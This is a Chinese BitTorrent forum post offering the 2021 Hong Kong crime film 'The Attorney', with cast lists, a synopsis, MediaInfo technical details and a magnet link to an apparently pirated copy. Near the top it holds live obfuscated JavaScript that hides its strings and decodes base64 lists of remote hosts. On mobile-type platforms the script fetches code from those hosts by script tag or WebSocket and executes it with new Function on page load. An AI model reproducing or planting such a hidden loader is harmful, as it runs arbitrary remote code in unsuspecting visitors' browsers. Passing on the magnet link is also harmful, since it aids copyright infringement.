一级指控[国语配音/中文字幕].The.Attorney.2021.1080p.WEB-DL.H265.DDP5.1 1.61GB

版主小s 8天前 162

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDA2OQ==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x6b\x62\x74\x42\x4f\x58\x63\x64\x53\x4e']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxzZGtmai41MS10b3VyLm5ldCxodHRwczovL29zbGRramZsLmNoYYW95aTQuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译 名 一级指控

◎片 名 一級指控

◎年 代 2021

◎产 地 中国大陆 / 中国香港

◎类 别 动作 / 悬疑 / 犯罪

◎语 言 粤语

◎上映日期 2021-10-08(中国大陆网络)

◎IMDb链接 https://www.imdb.com/title//

◎豆瓣链接 https://movie.douban.com/subject/30200973/

◎片 长 103分钟

◎导 演 黄国辉 Kowk Fai Huang (id:1321361)

◎编 剧 鲍伟聪 Alex Pao (id:1320767)

甄栢荣 Yan Pak Wing (id:1320827)

何永航 Ho Wing Hong (id:1375997)

李浩田 Hotin Li (id:1405544)

杜瑞榕 Frances To (id:1370838)

◎演 员 方中信 Alex Fong (id:1033102)

谭耀文 Patrick Tam (id:1033280)

陈家乐 Carlos Chan (id:1275972)

鲍起静 Hee Ching Paw (id:1274229)

廖启智 Kai Chi Liu (id:1274268)

曾江 Kenneth Tsang (id:1275451)

张建声 Justin Cheung (id:1323927)

何珮瑜 Jeana Ho (id:1316213)

张松枝 Deno Cheung (id:1339097)

骆应钧 Ying Kwan Lok (id:1274577)

陈嘉莉 Kelly Chen (id:1377721)

陈保元 Ricky Chan Po-Yuen (id:1324055)

黄定谦 Himmy Wong (id:1379150)

廖碧儿 Bernice Jan Liu (id:1215093)

甄琪 Zhenqi Qi (id:1378123)

曹越 Cao Yue (id:1411458)

戈其文 (id:1409037)

李文然 (id:1409036)

熊鹏 (id:1414008)

陶靜 (id:1414009)

朱玮杰 Weijie Zhu (id:1400327)

周文财 (id:1414010)

吴取干 (id:1414011)

何东钰 (id:1414012)

刘嘉璧 Cherrie Lau (id:1413889)

张琦 Qi Zhang (id:1423615)

谢忠道 Kenny Tse (id:1319336)

◎标 签 香港 / 香港电影 / 犯罪 / 廖启智 / 悬疑 / 方中信 / 香港電影 / 华语

◎简 介

CK律所在城中是一家声名卓著的律师事务所,合伙人之一雷有辉(方中信饰演)更有法律界“常胜将军”的声誉,却在十年前的成富商场倒塌案中令一众商户败诉。城中首富郭世荣(廖启智饰演)的女儿郭嘉仪在工作室中离奇暴毙,当年商户珠妈(鲍起静饰演)的孙儿李逸峰因在现场而作为嫌疑人被捕,并被控以一级谋杀罪名!珠妈面对孙儿被控谋杀手足无措, 只能求助法律援助。雷有辉律所的合伙人张美仪接受了珠妈这宗法援,派出律所新人何学铭(陈嘉乐饰演)负责。为了补偿十年前的官司败诉的愧疚,雷有辉也决心协助何学铭为李逸峰沉冤昭雪。在调查的过程中,雷有辉抽丝剥茧,发现案件另有隐情,却遭遇证人反口、证剧被毁、同僚遇害……如何将真凶绳之以法,雷有辉唯有在最后的庭审中绝地反击!

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 152110514466476533454141013086345355749 (0x726F6B622BA83C8F882F831132C3E1E5)

  4. Complete name : 一级指控[email protected]

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 1.61 GiB

  8. Duration : 1 h 41 min

  9. Overall bit rate : 2 263 kb/s

  10. Encoded date : UTC 2021-10-08 10:44:07

  11. Writing application : mkvmerge v61.0.0 ('So') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : [email protected]@Main

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 1 h 41 min

  20. Bit rate : 1 749 kb/s

  21. Width : 1 920 pixels

  22. Height : 808 pixels

  23. Display aspect ratio : 2.40:1

  24. Frame rate mode : Constant

  25. Frame rate : 24.000 FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 8 bits

  29. Bits/(Pixel*Frame) : 0.047

  30. Stream size : 1.25 GiB (77%)

  31. Default : Yes

  32. Forced : No


  33. Audio #1

  34. ID : 2

  35. Format : E-AC-3

  36. Format/Info : Enhanced AC-3

  37. Commercial name : Dolby Digital Plus

  38. Codec ID : A_EAC3

  39. Duration : 1 h 41 min

  40. Bit rate mode : Constant

  41. Bit rate : 256 kb/s

  42. Channel(s) : 6 channels

  43. Channel layout : L R C LFE Ls Rs

  44. Sampling rate : 48.0 kHz

  45. Frame rate : 31.250 FPS (1536 SPF)

  46. Compression mode : Lossy

  47. Stream size : 187 MiB (11%)

  48. Service kind : Complete Main

  49. Default : Yes

  50. Forced : No


  51. Audio #2

  52. ID : 3

  53. Format : E-AC-3

  54. Format/Info : Enhanced AC-3

  55. Commercial name : Dolby Digital Plus

  56. Codec ID : A_EAC3

  57. Duration : 1 h 41 min

  58. Bit rate mode : Constant

  59. Bit rate : 256 kb/s

  60. Channel(s) : 6 channels

  61. Channel layout : L R C LFE Ls Rs

  62. Sampling rate : 48.0 kHz

  63. Frame rate : 31.250 FPS (1536 SPF)

  64. Compression mode : Lossy

  65. Stream size : 187 MiB (11%)

  66. Service kind : Complete Main

  67. Default : Yes

  68. Forced : No




复制代码


TAGS 动作 悬疑 犯罪

磁力链:
  • magnet:?xt=urn:btih:353A835B642F7B804F228CFB6A9EC9257AC812D8
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回